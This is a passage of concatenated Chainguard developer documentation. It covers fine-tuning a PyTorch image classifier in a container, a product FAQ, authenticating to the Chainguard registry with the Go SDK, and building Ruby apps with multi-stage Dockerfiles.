Chainguard’s pytorch container image will walk you through fine-tuning an image classification model, saving the model, and running it securely for inference. We’ll also compare the security and footprint of the PyTorch Chainguard Container to the official runtime container image distributed by PyTorch and present ways to adapt the resources in this tutorial to your own deep learning projects powered by PyTorch. What is Deep Learning? Deep learning is a subset of machine learning that leverages a flexible computational architecture, the neural network, to address a wide variety of tasks. Neural networks emulate the structure of the brain and consist of interconnected nodes (neurons) that each contain an associated weight and threshold. In concert with an activation function, these values determine whether data is propagated within the network, producing an output layer corresponding to a classification, regression, or other result. By technical convention, a deep neural network (DNN) has at least three layers: an input layer, an output layer, and one or more hidden layers. In practice, DNNs often have many layers. Deep neural networks underpin many common computational tasks in modern applications, such as speech to text and generative AI. Setting up CUDA Compute Unified Device Architecture (CUDA) is a parallel computing platform developed by NVIDIA. To take advantage of connected GPUs, you’ll need to follow the setup instructions for your local machine or create a CUDA-enabled instance on a cloud provider. To set up CUDA on your local machine, follow the installation instructions for Linux or Windows. CUDA is not currently supported on Mac OS. Google Cloud Platform provides CUDA-ready deep learning instances, including PyTorch-specific instructions. Amazon Web Services also provides CUDA-ready deep learning instances. This guide is designed for use in an environment with access to one or more NVIDIA GPUs. However, the code below is written to also run in a CPU-only environment. Please note that tuning the model will take significantly longer in a CPU-only environment. Testing Access to GPUs Our first step is to check whether our PyTorch-CUDA environment has access to connected GPUs. If you don’t already have Docker Engine installed, follow the instructions for installing Docker Engine on your host machine. Run the below command to pull the container image, run it with GPU access, and start a Python interpreter inside the running container. docker run --rm -it \ --gpus all \ cgr.dev/chainguard/pytorch:latest Running the above for the first time may take a few minutes to pull the pytorch Chainguard Container, currently 3.3GB. Once the image runs, you will be interacting with a Python interpreter in the running container. Enter the following commands at the prompt to check the availability of your GPU. Python 3.11.9 (main, Apr 2 2024, 15:40:32) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import torch >>> torch.cuda.is_available() True >>> torch.cuda.device_count() 1 >>> torch.cuda.get_device_name(0) 'Tesla V100-SXM2-16GB' If the CUDA computing environment is accessible to PyTorch, torch.cuda.is_available() will return True. You should also check that at least one GPU is connected. If your environment only has access to CPU, you can complete the rest of this tutorial, but the step of fine-tuning the pretrained model will take significantly longer. Once you’ve determined that your environment has access to CUDA and connected GPUs, exit the container by typing Control-d or by typing exit() and pressing Enter. You should be returned to the prompt of your host machine. Training and Inference Overview A common workflow in deep learning is to collect labeled data, train a model using that data, and store the model. Later, this model can be loaded and used for inference, or making predictions based on novel inputs not in the training set. For example, we might train a model to recognize animals, then store the model as a serialized and compressed file. Later, and possibly in a new environment, we can load the model and use it to perform a classification task on novel data, such as an image of a whale provided by a user. It is common for model training to be performed in a development environment, and for inference to be performed in a production environment. We will follow this assumption in this tutorial, but be mindful not to use privileged access or root users in production. In this tutorial, we’ll fine-tune a pretrained model for an image classification task: classifying whether a provided image is an octopus 🐙, a whale 🐳, or a penguin 🐧. We’ve chosen these animals in appreciation of Wolfi and Chainguard, Docker, and Linux, respectively. Rather than train a model from scratch, a process that requires a large set of input data, we’ll start with a ResNet model with 18 layers (resnet18). Using a fine-tuning approach with a pretrained model with relatively few layers is appropriate when using a limited amount of input data. In our case, we’ll be using 60 images for each class, further divided into 40 training and 20 validation images. For the training step, we’ll be accessing the container image as root. This allows us to save the model to a volume and preserve it on the host system. In our inference step, we’ll access the container as the nonroot user, an approach that will be more secure for a production use case. Fine-Tuning the Model In this section, we’ll download prepared data to your environment, download a model training script, and run the script to train and save the model. These tasks will all be performed by running the below command. Further details on the Docker command, input data, and script are provided later in the section. First check that curl and tar are available on your system, and install them if necessary. Docker Engine will also need to be installed. Run the following to download necessary files and train the model. If there is an issue with the command, see the manual step-by-step instructions below. Note: if you’re following this tutorial in an environment without access to GPU, remove the --gpus all \ line below before running. mkdir image_classification && cd image_classification curl https://codeload.github.com/chainguard-dev/pytorch-getting-started/tar.gz/main | \ tar -xz --strip=1 pytorch-getting-started-main/ && \ docker run --user root --rm -it \ --gpus all \ -v "$PWD/:/home/nonroot/octopus-detector" \ cgr.dev/chainguard/pytorch:latest \ "/home/nonroot/octopus-detector/image_classification.py" The above command creates a new folder, image_classification, and changes the working directory to that folder. It then uses curl to download the training script and training and validation images from GitHub as a tar file and extracts the files. A container based on the pytorch container image is then created and the script and data are shared between host and container in a volume. The model is trained using the provided script and data, and the resulting model is saved to the volume. Training should take 1-3 minutes in a GPU-equipped environment, and 20-30 minutes in a CPU-only environment. Once the command completes, you can check your current working directory for a trained model as a .pt file: $ ls README.md image_classification.py data octopus_whale_penguin_model.pt Manual Steps to Fine-Tune the Model Below are manual steps to perform the above download and training procedure interactively. You may wish to follow these steps if you need to modify the above for your own use case, if you’d like to better understand the steps involved, or if you have difficulty running the above command in your environment. These steps use git clone rather than curl. Also note that this manual process uses the :latest-dev version of the container image, since the :latest container image does not include shells such as bash for increased security. In the below steps, the prompt of your host machine will be denoted as (host) $, while the prompt of the container machine will be denoted as (container) $ Check that you have Git and Docker installed: (host) $ git --version git version 2.30.2 (host) $ docker --version Docker version 20.10.17, build 100c701 Clone the repository with the training and validation data and the training script and cd into the cloned repository: (host) $ git clone https://github.com/chainguard-dev/pytorch-getting-started.git (host) $ cd pytorch-getting-started Run the below command to start an interactive session in a running pytorch Chainguard Container with root access. If your environment doesn’t have access to GPU, remove the --gpus all \ line before running. Note the volume option, which creates a volume on the container based on the current working directory, allowing access to our training script and data inside the container. Remember that this guide assumes you are training the model in a controlled development environment—do not use root access in any production senario. (host) $ docker run --user root --rm -it \ --gpus all \ --entrypoint bash \ -v "$PWD/:/home/nonroot/octopus-detector" \ cgr.dev/chainguard/pytorch:latest-dev You should now have access to an interactive shell inside the container. Navigate to the created volume: (container) $ cd /home/nonroot/octopus-detector/ (container) $ pwd /home/nonroot/octopus-detector Run the model-training script: (container) $ python image_classification.py Downloading: "https://download.pytorch.org/models/resnet18-f37072fd.pth" to /root/.cache/torch/hub/checkpoints/resnet18-f37072fd.pth 100.0% 🐙 Epoch 0/24 🐳 train Loss: 0.9276 Acc: 0.5583 🐧 val Loss: 0.2275 Acc: 0.9500 [...] 🐙 Epoch 24/24 🐳 train Loss: 0.1940 Acc: 0.9167 🐧 val Loss: 0.0248 Acc: 1.0000 Training complete in 1m 39s Best val Acc: 1.000000 If the script ran successfully, you should have a saved model serialized as a .pt file in the current working directory: (container) $ ls octopus_whale_penguin_model.pt data image_classification.py At this point, you’ve trained your model. Shut down the container by pressing Control-d or by typing exit and pressing Enter. Since we used a volume, the model should also be present on the host machine: (host) $ ls octopus_whale_penguin_model.pt image_classification.py data Running Inference You have now downloaded the resnet18 pretrained model and fine-tuned it to detect three classes of images: octopuses, whales, and penguins. Now that the model is trained, we can load it, pass in a new image, and receive the model’s prediction. Using an existing model for prediction is called inference, and in many common scenarios inference is run in a production environment. For this reason, we’ll access our existing model with the nonroot user in this section. The script (image_classification.py) run in the above commands has been written to check if a model exists in the same folder and, if present, load it. It will also perform inference if a path to an image is passed as an argument when the script is run. Since we should now have a model file present on our host machine, let’s go ahead and run inference on a new image of an octopus. Feel free to find your own image of an octopus on the web, or run the below command to download an image not in the training data. The training data used realistic images, so you may not wish to choose, for example, a stylized or cartoon image of an octopus. curl https://raw.githubusercontent.com/chainguard-dev/pytorch-getting-started/main/inference-images/octopus.jpg > octopus.jpg Now that we have a novel input, let’s run inference to classify the image: docker run --rm -it \ --gpus all \ -v "$PWD/:/home/nonroot/octopus-detector" \ cgr.dev/chainguard/pytorch:latest \ "/home/nonroot/octopus-detector/image_classification.py" \ "/home/nonroot/octopus-detector/octopus.jpg" After running this, you should see the model’s classification of the image as output: octopus Feel free to try the above inference on other images of octopuses, whales, and penguins. The model should have high accuracy for images similar to those in the training set, which consists of photorealistic images. Notes on the Script In this section, we’ll review the script provided in the above steps, highlighting some common options and approaches and a few ways the script might be adapted to other use cases. Deep learning is a complex and emerging field, so this section can only provide a high-level overview and a few recommendations for moving forward. To fine-tune a model for image classification as we did here, you can replace the provided training and validation data with your own. The script examines the number of folders in the training set to determine the targeted number of classes. The folder names are used as class labels. We used 40 training and 20 validation images for each class, but a ratio of 5:1 training to validation may also produce good results. By fine-tuning a pretrained model, we took advantage of transfer learning, meaning that the pretrained model (resnet18) was already trained on inputs with relevance to our classification task. Because we used transfer learning, the relatively small amount of input data was still sufficient for good accuracy in our fine-tuned model. If you’re working with a large amount of input data, you might consider using a larger pretrained model, such as resnet34. In addition, if training using significantly more data or training using limited computation relative to the task, you may consider the more efficient convolutional neural network as fixed feature extractor approach, which trains only one attached layer rather than updates the original model. PyTorch maintains a set of guides that are frequently updated. These provide a good starting point when undertaking a new project in PyTorch. If you’re new to the field of deep learning, the book Deep Learning for Coders with Fastai and PyTorch hosts freely available materials on GitHub. --- ### Chainguard Containers FAQs URL: https://edu.chainguard.dev/chainguard/chainguard-images/faq/ Last Modified: December 18, 2024 Tags: Chainguard Containers, FAQ, Product Learn answers to your questions about Chainguard Containers. Which Linux distribution is used as base for Chainguard Containers? Chainguard Containers are based on Wolfi, a Linux undistro we built specifically to address software supply chain security issues. We call it an undistro because it doesn’t contain certain software you’d normally find in a traditional Linux distribution such as Debian or Alpine. Wolfi is a minimal Linux distribution designed specifically to be used as a base for stripped-down container images. How do Chainguard Containers relate to the Google Distroless Container Images? The Google distroless images follow a similar philosophy to many of our images: they are minimal images that don’t include package managers or shells. The main difference is in the implementation. The Google distroless images are built with Bazel and based on the Debian distribution, whereas Chainguard Containers are built with apko and based on Wolfi. We believe our approach is more maintainable and extensible. Which images are available? There are currently over a thousand Chainguard Containers available, which are segmented as Starter or Production. You can read more about this in the next question. Chainguard Containers are primarily available from Chainguard’s registry, but a selection of Starter images is also available on Docker Hub. You can find the complete list of available Chainguard Containers in our public Containers Directory or within the Chainguard Console. What options do I have to use Chainguard Containers? You can get free Chainguard Containers for your organization. You can also upgrade for more versions, SLAs, and dedicated support. Starter Production Free for everyone, anywhere Contact us for pricing Latest versions Major and minor versions Community support Enterprise SLAs Developer Docs Customer support You can read more about the differences between Starter and Production Containers in our Containers Overview. Are Chainguard Containers available on Docker Hub? Yes, Chainguard Starter Container images are available on Docker Hub. As a Docker Verified Publisher, Chainguard has met Docker’s stringent standards for security, quality, and transparency. This status signifies that our container images are trusted, reliable, and have undergone rigorous verification processes. If you wish to use Production Containers, you will use Chainguard’s registry. What is an SBOM and why is it important? An SBOM is a Software Bill of Materials, which is a list containing detailed information about all software that is included within a software artifact, whether it’s an application, a container image, or a physical appliance. SBOMs provide visibility into the software you depend on. They can allow automated systems to quickly identify issues such as unpatched vulnerabilities, since SBOMs typically include the version of each dependency listed. Who maintains Chainguard Containers? Chainguard Containers are officially maintained by Chainguard engineers. How often are Chainguard Containers updated? Chainguard Containers are rebuilt every night to ensure that new package versions and security updates in upstream Wolfi are quickly applied. Can I simply replace my current base image with a Chainguard Container and it will work out of the box? Chainguard Containers are designed to be minimal, and many of them don’t come with a package manager. Depending on your stack and specific dependencies, you may need to include additional software by combining -dev container images and our distroless images in a multi-stage Docker build. What packages are available in Chainguard Containers? Chainguard Containers only contain packages that come from the Wolfi Project or those that are built and maintained internally by Chainguard. Starting in March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These will track the latest version of the upstream software in the package. Chainguard will end patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. The tools we use to build packages and images remain freely available and open source in Wolfi. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our customers. Note that specific package versions can be made available in Production containers. If you have a request for a specific package version, please contact us. What does Chainguard do when a CVE is published, but a patch is not available from the owner of the OSS code? Chainguard investigates the CVE and marks relevant images as affected or not. If Chainguard can identify a patch that’s unreleased, Chainguard may apply a patch before it lands upstream. In either case, when the patch lands upstream, Chainguard picks it up and rolls it out. I added software on top of one of Chainguard’s base container images, why are there CVEs? Chainguard is not responsible for CVEs in software you add on top of base images. Do I need to authenticate into Chainguard to use Chainguard Containers? Logging in is optional if you are only using Starter containers. That being said, there are benefits for all users who authenticate to Chainguard’s registry, as Chainguard provides notifications of version updates, breaking changes, or critical security updates. To learn how to authenticate into Chainguard’s registry, you can review our authentication documentation . You can read more about the thought process behind authentication in our blog post, Scaling Chainguard Containers with a growing catalog and proactive security updates. Is Chainguard FedRAMP certified? You will need to ingest Chainguard Containers into an image repository within your FedRAMP boundary. Your repo requires FedRAMP but Chainguard does not since we’re outside the boundary. Please reach out if you need more details. --- ### Authenticating with the Chainguard SDK URL: https://edu.chainguard.dev/chainguard/administration/sdk-authentication/ Last Modified: June 4, 2025 Tags: Product, Procedural There are several ways for users to interact with the Chainguard platform, with chainctl (Chainguard’s command-line tool) and the Chainguard Console (Chainguard’s web interface) being the two most commonly-used methods. However, both of these require a human user to authenticate, and aren’t useful for working with Chainguard resources programmatically. The Chainguard SDK serves to ease programmatic integration with the Chainguard platform. This guide highlights two examples from the SDK repository that show how to authenticate to the Chainguard registry using the chainguard.dev/sdk/auth and chainguard.dev/sdk/auth/ggcr packages. The first has you authenticate as a local user, while the second has you authenticate as an assumed identity. For more information about the examples highlighted in this guide, refer to the examples folder in the SDK repository. Prerequisites To follow along with this guide you must have Go installed to run the provided examples, which are written in Golang. Additionally, it may help to run these examples from a temporary directory, like /tmp so the code is automatically removed from your system the next time it boots: cd /tmp Example 1 — Authenticate Using Local Credentials The first example from the SDK repository we will go over is the chainctl example. This example shows how to use a token source backed by chainctl — Chainguard’s command-line tool — to access the Chainguard registry using local credentials. The chainctl example consists of the following Go code in a main.go file (with comments removed): package main import ( "context" "encoding/json" "log" "os" "chainguard.dev/sdk/auth" "chainguard.dev/sdk/auth/ggcr" "github.com/google/go-containerregistry/pkg/name" "github.com/google/go-containerregistry/pkg/v1/remote" ) func main() { ctx := context.Background() ts := auth.NewChainctlTokenSource(ctx, auth.WithAudience("cgr.dev")) desc, err := remote.Get(name.MustParseReference("cgr.dev/chainguard/static"), remote.WithAuthFromKeychain(ggcr.TokenSourceKeychain(ts))) if err != nil { log.Fatalf("error getting reference: %v", err) } enc := json.NewEncoder(os.Stdout) enc.SetIndent("", " ") _ = enc.Encode(desc) } This code works by executing the chainctl binary to retrieve a token and making a call directly to the registry. Specifically, it does the following things: It imports some packages, including the Chainguard SDK’s auth and auth/ggcr packages. These are what allow the program to interact with the Chainguard registry. The example uses the auth package to execute the chainctl CLI binary to retrieve a token based on the local user’s credentials. Using this token, the example makes a call to the Chainguard registry to retrieve some information about the supplied image. The example uses the cgr.dev/chainguard/static Starter image. To run this example, save the main.go file to your local machine. Then run the following commands: go mod init github.com/chainguard-dev/sdk && go mod tidy The go mod init command will initialize a new go.mod file in the current directory. Including the github.com/chainguard-dev/sdk URL tells Go to use that as the module path. The go mod tidy command ensures that the new go.mod file matches the source code in the module. Following that, execute the program with go run: go run main.go This will return output like the following: { "mediaType": "application/vnd.oci.image.index.v1+json", "size": 925, "digest": "sha256:633aabd19a2d1b9d4ccc1f4b704eb5e9d34ce6ad231a4f5b7f7a3af1307fdba8", "Manifest": "eyJzY2hlbWFWZXJzaW9uIjoyLCJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLmluZGV4LnYxK2pzb24iLCJtYW5pZmVzdHMiOlt7Im1lZGlhVHlwZSI6ImFwcGxpY2F0aW9uL3ZuZC5vY2kuaW1hZ2UubWFuaWZlc3QudjEranNvbiIsInNpemUiOjgzOCwiZGlnZXN0Ijoic2hhMjU2OmJiMmRlMjU3MjFlMTE3Zjg4MDYwYjgyZGQ2YWQ1M2Y4ODdlZTgwOWU1MzE1Y2Y0MWEwMGNkOGExM2ZhMjMwNzciLCJwbGF0Zm9ybSI6eyJhcmNoaXRlY3R1cmUiOiJhbWQ2NCIsIm9zIjoibGludXgifX0seyJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLm1hbmlmZXN0LnYxK2pzb24iLCJzaXplIjo4MzgsImRpZ2VzdCI6InNoYTI1NjoxMmVjMWU3NDg0NmVhNDM1OTNkNmExMzMwZGEyOGVkNGQzNmRmNThhMTg2NGQwOTE1MjRlM2IwYTk5MDY4Y2QzIiwicGxhdGZvcm0iOnsiYXJjaGl0ZWN0dXJlIjoiYXJtNjQiLCJvcyI6ImxpbnV4In19XSwiYW5ub3RhdGlvbnMiOnsiZGV2LmNoYWluZ3VhcmQucGFja2FnZS5tYWluIjoiIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmF1dGhvcnMiOiJDaGFpbmd1YXJkIFRlYW0gaHR0cHM6Ly93d3cuY2hhaW5ndWFyZC5kZXYvIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmNyZWF0ZWQiOiIyMDI1LTA1LTI4VDEzOjM1OjQ4WiIsIm9yZy5vcGVuY29udGFpbmVycy5pbWFnZS5zb3VyY2UiOiJodHRwczovL2dpdGh1Yi5jb20vY2hhaW5ndWFyZC1pbWFnZXMvaW1hZ2VzL3RyZWUvbWFpbi9pbWFnZXMvc3RhdGljIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLnVybCI6Imh0dHBzOi8vaW1hZ2VzLmNoYWluZ3VhcmQuZGV2L2RpcmVjdG9yeS9pbWFnZS9zdGF0aWMvb3ZlcnZpZXciLCJvcmcub3BlbmNvbnRhaW5lcnMuaW1hZ2UudmVuZG9yIjoiQ2hhaW5ndWFyZCJ9fQ==" } The example returns the image’s digest and the OCI manifest data. This proves that you’ve gotten a response back from the registry and that authentication worked as expected. This example doesn’t really reflect a real-world use case, as users will generally access cgr.dev/chainguard container repositories without authenticating. However, by presenting a token it will trigger the authentication checks, making this example useful for illustrating how this can be done with the Chainguard SDK. You can experiment with updating this example to retrieve information about a different Chainguard container image by changing the cgr.dev/chainguard/static value in the main() function. You could replace this with any Chainguard repository you have access to, and the example will return information about that image. Example 2 — Authenticate with an Assumed Identity The exchange example demonstrates how to exchange a token for an assumed identity to access the registry. This example consists of the following Go code in a main.go file (with comments removed): package main import ( "context" "encoding/json" "log" "os" "chainguard.dev/sdk/auth" "chainguard.dev/sdk/auth/ggcr" "github.com/google/go-containerregistry/pkg/name" "github.com/google/go-containerregistry/pkg/v1/remote" ) const ( sub = "720909c9f5279097d847ad02a2f24ba8f59de36a/a033a6fabe0bfa0d" ) func main() { ctx := context.Background() ts := auth.NewChainctlTokenSource(ctx) desc, err := remote.Get(name.MustParseReference("cgr.dev/chainguard/static"), remote.WithAuthFromKeychain(ggcr.Keychain(sub, ts))) if err != nil { log.Fatalf("error getting reference: %v", err) } enc := json.NewEncoder(os.Stdout) enc.SetIndent("", " ") _ = enc.Encode(desc) } This example is similar to the previus one, but has the following differences: It creates a constant named sub. In this example, the sub constant’s value is set to the UIDP of a Chainguard identity named all-users which can be assumed by any Chainguard user. It takes the token retrieved with the chainctl binary and exchanges it for the assumable identity to make a call to the Chainguard registry in order retrieve some information about the supplied image. The example uses the cgr.dev/chainguard/static Starter image. To run this example, First, delete the previous example’s main.go file if you haven’t alraedy. Then save the exchange example’s main.go file to your local machine. Then run the following go mod init and go mod tidy commands: go mod init github.com/chainguard-dev/sdk && go mod tidy Following that, execute the program: go run main.go This will return output like the following: { "mediaType": "application/vnd.oci.image.index.v1+json", "size": 925, "digest": "sha256:633aabd19a2d1b9d4ccc1f4b704eb5e9d34ce6ad231a4f5b7f7a3af1307fdba8", "Manifest": "eyJzY2hlbWFWZXJzaW9uIjoyLCJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLmluZGV4LnYxK2pzb24iLCJtYW5pZmVzdHMiOlt7Im1lZGlhVHlwZSI6ImFwcGxpY2F0aW9uL3ZuZC5vY2kuaW1hZ2UubWFuaWZlc3QudjEranNvbiIsInNpemUiOjgzOCwiZGlnZXN0Ijoic2hhMjU2OmJiMmRlMjU3MjFlMTE3Zjg4MDYwYjgyZGQ2YWQ1M2Y4ODdlZTgwOWU1MzE1Y2Y0MWEwMGNkOGExM2ZhMjMwNzciLCJwbGF0Zm9ybSI6eyJhcmNoaXRlY3R1cmUiOiJhbWQ2NCIsIm9zIjoibGludXgifX0seyJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLm1hbmlmZXN0LnYxK2pzb24iLCJzaXplIjo4MzgsImRpZ2VzdCI6InNoYTI1NjoxMmVjMWU3NDg0NmVhNDM1OTNkNmExMzMwZGEyOGVkNGQzNmRmNThhMTg2NGQwOTE1MjRlM2IwYTk5MDY4Y2QzIiwicGxhdGZvcm0iOnsiYXJjaGl0ZWN0dXJlIjoiYXJtNjQiLCJvcyI6ImxpbnV4In19XSwiYW5ub3RhdGlvbnMiOnsiZGV2LmNoYWluZ3VhcmQucGFja2FnZS5tYWluIjoiIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmF1dGhvcnMiOiJDaGFpbmd1YXJkIFRlYW0gaHR0cHM6Ly93d3cuY2hhaW5ndWFyZC5kZXYvIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmNyZWF0ZWQiOiIyMDI1LTA1LTI4VDEzOjM1OjQ4WiIsIm9yZy5vcGVuY29udGFpbmVycy5pbWFnZS5zb3VyY2UiOiJodHRwczovL2dpdGh1Yi5jb20vY2hhaW5ndWFyZC1pbWFnZXMvaW1hZ2VzL3RyZWUvbWFpbi9pbWFnZXMvc3RhdGljIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLnVybCI6Imh0dHBzOi8vaW1hZ2VzLmNoYWluZ3VhcmQuZGV2L2RpcmVjdG9yeS9pbWFnZS9zdGF0aWMvb3ZlcnZpZXciLCJvcmcub3BlbmNvbnRhaW5lcnMuaW1hZ2UudmVuZG9yIjoiQ2hhaW5ndWFyZCJ9fQ==" } As with the chainctl example, the exchange example returns the image’s digest and the OCI manifest data. This proves that you’ve gotten a response back from the registry and that authentication worked as expected. Again, this example doesn’t really reflect a real-world use case. Users will generally access Starter container repositories without authenticating, but this example is still useful for understanding how this can be done with the Chainguard SDK. You can experiment with updating this example to authenticate by assuming an identity you created and retrieve the digest of a container image from your organization’s private repository within the Chainguard registry. To do so, you will need an appropriately-configured assumable identity. You can create an assumable identity with the chainctl iam identities create command. Learn More The Chainguard SDK is a powerful tool for interacting with the Chainguard platform. As mentioned previously, the examples covered in this guide don’t represent a practical real-world application, but they are useful for understanding how the Chainguard SDK works and can be used to authenticate to the Chainguard platform. To learn more, you may be interested in the following resources: Overview of Assumable Identities in Chainguard Authenticate to Chainguard’s Registry Chainguard OpenAPI Specification --- ### Getting Started with the Ruby Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/ruby/ Last Modified: February 21, 2025 Tags: Chainguard Containers, Product The Ruby container images maintained by Chainguard are a mix of development and production distroless images that are suitable for building and running Ruby workloads. Because Ruby applications typically require the installation of third-party dependencies via Rubygems, using a pure distroless image for building your application would not work. In cases like this, you’ll need to implement a multi-stage Docker build that uses one of the -dev images to set up the application. In this guide, we’ll build two example applications that demonstrate how to use Ruby container images based on Wolfi as a runtime. In the first, we’ll use a minimal image containing just Ruby to execute a demo that doesn’t have any external dependencies. In the second example, we’ll set up a multi-stage Docker build to run a demo that requires the installation of Rubygems via bundler. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Example 1: Minimal Ruby Container in Single Stage Build We’ll start by creating a small command-line Ruby application to serve as a demo. This application has no external dependencies; it will read from a text file containing facts about octopuses, and output a random line from that file. This demo is also available in our demos repository, if you want to review the source files before building it. Step 1: Setting up the Application First, create a directory and then move into it for your app. Here we’ll use octo-facts: mkdir ~/octo-facts && cd ~/octo-facts Next, create a new file to serve as the application entry point. Here, we’ll use octo.rb. You can edit this file in whatever code editor you would like. We’ll use nano as an example. nano octo.rb The following Ruby code will read a random line from the facts.txt file and print it out to the terminal: #!/usr/bin/env ruby class OctoFact attr_accessor :source def initialize(source = "facts.txt") @source = source end def random_line puts File.readlines(@source).sample end end if __FILE__ == $0 fact = OctoFact.new fact.random_line end Copy this code to your octo.rb script, then save and close the file. Next, pull down the facts.txt file with curl. You can inspect the file’s contents before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your octo.rb script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/ruby/octo-facts/facts.txt With all files in place, you can now run the demo using Docker. The following command will execute the demo code using the same base image we’ll use to build our Dockerfile in the next step. It will set up a volume sharing the files in the current directory with the location /work inside the container, then execute the octo.rb script: docker run --rm -v ${PWD}:/work cgr.dev/chainguard/ruby octo.rb And you should get output like this, with a random fact about octopuses: Octopuses have decentralized brains. In the next step, we’ll create a Dockerfile to build and run the demo. Step 2: Setting up the Dockerfile With the demo ready, you can now set up a Dockerfile to build a custom image for your Ruby application. Make sure you’re still on the same directory as the application files, then create a new Dockerfile using your text editor of choice: nano Dockerfile The following Dockerfile will: Start a new image based on the cgr.dev/chainguard/ruby:latest container image; Set up a workdir at /app; Copy the application files to the workdir; Set up the entry point for the container as ruby octo.rb. Copy the following content to your Dockerfile: FROMcgr.dev/chainguard/ruby:latestWORKDIR/appCOPY octo.rb facts.txt ./ENTRYPOINT [ "ruby", "octo.rb" ]Save and close the file when you’re done. Next, build the container image with: docker build . --pull -t octo-ruby-demo Once the build is finished, you can execute the container with: docker run --rm octo-ruby-demo And you should get output similar to what you got before, with a random octopus fact. Example 2: Multi-Stage Build for Ruby Application Runtime To demonstrate how to containerize a more complex application that requires the installation of third party dependencies, we’ll create a second demo that uses a Docker multi-stage build, which will combine the cgr.dev/chainguard/ruby:latest-dev development image to build the application and the cgr.dev/chainguard/ruby:latest distroless image to run it. This demo will use the rainbow Ruby gem to output to the command line interface a colorful quote, inspired by cowsay. Step 1: Setting up the Application First, create a directory for your app. Here we’ll use linky-says: mkdir ~/linky-says && cd ~/linky-says Then, set up your Gemfile: nano Gemfile Copy the following content into your Gemfile to require the Rainbow Gem: source 'https://rubygems.org' gem 'rainbow' Save and close the file. Next, create a new Ruby script file called linky.rb: nano linky.rb The following code outputs a colorful quote provided at runtime, incorporating an ASCII representation of Linky that is pulled from an linky.txt file located at the same directory as the ruby script. The printed quote colors alternate randomly between purple and magenta. #!/usr/bin/env ruby require 'rainbow' Rainbow.enabled = true class Linky def says(message = "Hello World") colors = [:purple, :magenta] words = message.split(" ") print "\n".ljust(40, " ") words.each do |n| print Rainbow(n).color(colors.sample) + " " end print "\n" puts File.readlines('linky.txt') end end if __FILE__ == $0 linky = Linky.new inputArray = ARGV message = inputArray.length > 0 ? inputArray.join(' ') : "Hello Wolfi" linky.says(message) end Copy this code to your linky.rb script, then save and close the file. Next, pull down the ASCII linky.txt file with curl. You can inspect the file contents before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your linky.rb script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/ruby/linky-says/linky.txt With everything in place, you can now work on the Dockerfile that will install the application dependencies and execute your Ruby script. Step 2: Setting Up the Dockerfile To make sure our final container is distroless while still being able to install Rubygems, our build will consist of two stages: first, we’ll build the application using the dev image variant, a Wolfi-based image that includes the Gem executable, Bundler, and other useful tools for development. Then, we’ll create a separate stage for the final container. The resulting container will be based on the distroless Ruby Wolfi image, which means it doesn’t come with the Gem executable or even a shell. Create a new Dockerfile using your code editor of choice, for example nano: nano Dockerfile The following Dockerfile will: Start a new build stage based on the cgr.dev/chainguard/ruby:latest-devcontainer image and call it builder; Set up environment variables that define the default location of installed Gems; Copy the Gemfile from the current directory to the /work location in the container; Install Bundler and run bundle install; Start a new build stage based on the cgr.dev/chainguard/ruby:latest image; Set up environment variables that define the default location of installed Gems; Copy build artifacts from builder and into the final container Copy the linky.rb and linky.txt files into the final container Set up the application entry point as ruby linky.rb. Copy this content to your own Dockerfile: FROMcgr.dev/chainguard/ruby:latest-dev AS builderENV GEM_HOME=/work/vendorENV GEM_PATH=${GEM_PATH}:/work/vendorCOPY Gemfile /work/RUN gem install bundler && bundle installFROMcgr.dev/chainguard/ruby:latestENV GEM_HOME=/work/vendorENV GEM_PATH=${GEM_PATH}:/work/vendorCOPY --from=builder /work/ /work/COPY linky.rb linky.txt /work/ENTRYPOINT [ "ruby", "linky.rb" ]Save the file when you’re finished. You can now build the image with: docker build . --pull -t linky-says Once the build is finished, run the container with: docker run --rm linky-says Wolfi says hi And you should get output like this: Wolfi says hi @@@ @@@*******@@@ / @@%**@@@@*******@@@ / @@*@@***********///@@ / @*************///////&@ / @@*****%@@@**////@@@&//@@ / @*****@**##@////@//##@//@ / @@*****@@@@//////@@@@//@@ / ,@@@@***////////////////@@@@, @@@*******/////////////////////(((((@@@ @*******//////////////////////((((((((@ @@@/////////@///////@///(((((%@@@ #@///////@@@///////@@@((((((#@ @@@ /@@///@@, @@@ If you inspect the image with a docker image inspect linky-says, you’ll notice that it has only three layers, thanks to the use of a multi-stage Docker build. docker image inspect linky-says ... "RootFS": { "Type": "layers", "Layers": [ "sha256:ec653fe8da922557dd1d78b47b2c0074a6e9257e5a15e596bc4e1fb1e325c3d8", "sha256:d9541a2e82274d8140ed7f4cc79ce92f295d13951585c4a433f1baa35015e1eb", "sha256:a44e5fee28e11702a63418bf76c009b1b4948f1b0426e0f199b83702ae187796" ] }, "Metadata": { "LastTagTime": "2023-05-09T19:53:16.060125796+02:00" } } ] In such cases, the last FROM section from the Dockerfile 